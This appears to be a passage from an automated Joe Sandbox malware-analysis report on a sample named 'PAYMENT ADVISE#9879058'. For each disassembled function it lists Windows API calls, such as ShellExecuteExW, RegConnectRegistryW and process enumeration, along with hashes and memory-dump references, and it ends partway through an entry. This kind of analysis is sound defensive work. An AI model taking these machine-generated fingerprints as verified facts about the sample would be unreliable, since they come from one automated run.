                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                          • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                          • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                          • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                          Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ConnectRegistry_wcslen
                          • String ID: HH
                          • API String ID: 535477410-2761332787
                          • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                          • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                          • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                          • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                          Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00457C34
                          • _memset.LIBCMT ref: 00457CE8
                          • ShellExecuteExW.SHELL32(?), ref: 00457D34
                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                          • CloseHandle.KERNEL32(?), ref: 00457DDD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                          • String ID: <$@
                          • API String ID: 1325244542-1426351568
                          • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                          • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                          • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                          • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                          Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                          • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                          • __wsplitpath.LIBCMT ref: 004737E1
                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                          • _wcscat.LIBCMT ref: 004737F6
                          • __wcsicoll.LIBCMT ref: 00473818
                          • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                          • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                          • String ID:
                          • API String ID: 2547909840-0
                          • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                          • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                          • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                          • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                          Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                          • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                          • String ID:
                          • API String ID: 2354583917-0
                          • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                          • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                          • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                          • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                          Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                          • GetMenu.USER32 ref: 004776AA
                          • GetMenuItemCount.USER32(00000000), ref: 004776CC
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                          • _wcslen.LIBCMT ref: 0047771A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Menu$CountItemStringWindow_wcslen
                          • String ID:
                          • API String ID: 1823500076-0
                          • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                          • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                          • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                          • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                          Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                          Download Yara Rule
                          APIs
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$Enable$Show$MessageMoveSend
                          • String ID:
                          • API String ID: 896007046-0
                          • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                          • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                          • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                          • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                          Function 004413F0 Relevance: 10.6, APIs: 7, Instructions: 114windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                          • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                          • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                          • SendMessageW.USER32(02F31B48,000000F1,00000000,00000000), ref: 004414C6
                          • SendMessageW.USER32(02F31B48,000000F1,00000001,00000000), ref: 004414F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow
                          • String ID:
                          • API String ID: 312131281-0
                          • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                          • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                          • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                          • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                          Function 0044849C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 004484C4
                          • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                          • IsMenu.USER32(?), ref: 0044857B
                          • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                          • DrawMenuBar.USER32 ref: 004485E4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Menu$Item$DrawInfoInsert_memset
                          • String ID: 0
                          • API String ID: 3866635326-4108050209
                          • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                          • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                          • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                          • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                          Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedIncrement.KERNEL32 ref: 0047247C
                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                          • Sleep.KERNEL32(0000000A), ref: 00472499
                          • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Interlocked$DecrementIncrement$Sleep
                          • String ID: 0vH
                          • API String ID: 327565842-3662162768
                          • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                          • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                          • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                          • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                          Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                          • GetFocus.USER32 ref: 00448B1C
                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$Enable$Show$FocusMessageSend
                          • String ID:
                          • API String ID: 3429747543-0
                          • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                          • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                          • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                          • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                          Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          • _memset.LIBCMT ref: 00401C62
                          • _wcsncpy.LIBCMT ref: 00401CA1
                          • _wcscpy.LIBCMT ref: 00401CBD
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                          • String ID: Line:
                          • API String ID: 1620655955-1585850449
                          • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                          • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                          • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                          • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                          Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                          • __swprintf.LIBCMT ref: 0045D3CC
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume__swprintf
                          • String ID: %lu$HH
                          • API String ID: 3164766367-3924996404
                          • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                          • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                          • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                          • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                          Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Msctls_Progress32
                          • API String ID: 3850602802-3636473452
                          • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                          • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                          • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                          • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                          Function 00455449 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                          Download Yara Rule
                          APIs
                          • ImageList_Destroy.COMCTL32(?), ref: 00455451
                          • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                          • String ID:
                          • API String ID: 3985565216-0
                          • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                          • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                          • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                          • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                          Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                          Download Yara Rule
                          APIs
                          • ___set_flsgetvalue.LIBCMT ref: 00415737
                          • __calloc_crt.LIBCMT ref: 00415743
                          • __getptd.LIBCMT ref: 00415750
                          • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                          • __dosmaperr.LIBCMT ref: 004157A9
                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                          • String ID:
                          • API String ID: 1269668773-0
                          • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                          • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                          • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                          • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                          Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
